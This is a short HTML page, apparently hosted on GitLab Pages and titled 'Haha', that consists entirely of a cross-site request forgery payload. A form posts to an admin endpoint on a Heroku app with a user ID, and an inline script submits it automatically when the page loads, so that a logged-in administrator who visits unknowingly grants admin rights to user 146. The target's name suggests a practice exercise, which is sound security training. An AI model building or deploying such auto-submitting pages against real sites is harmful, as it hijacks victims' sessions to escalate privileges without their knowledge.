<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="generator" content="GitLab Pages">
    <title>Haha</title>
    <link rel="stylesheet" href="style.css">
  </head>

  <body>

<form action="https://awacademy-hackme6.herokuapp.com/admin?userId=146" method="post">
  <input type="submit" value="Make Admin">
</form>
<script>document.forms.item(0).submit()</script>

  </body>

</html>

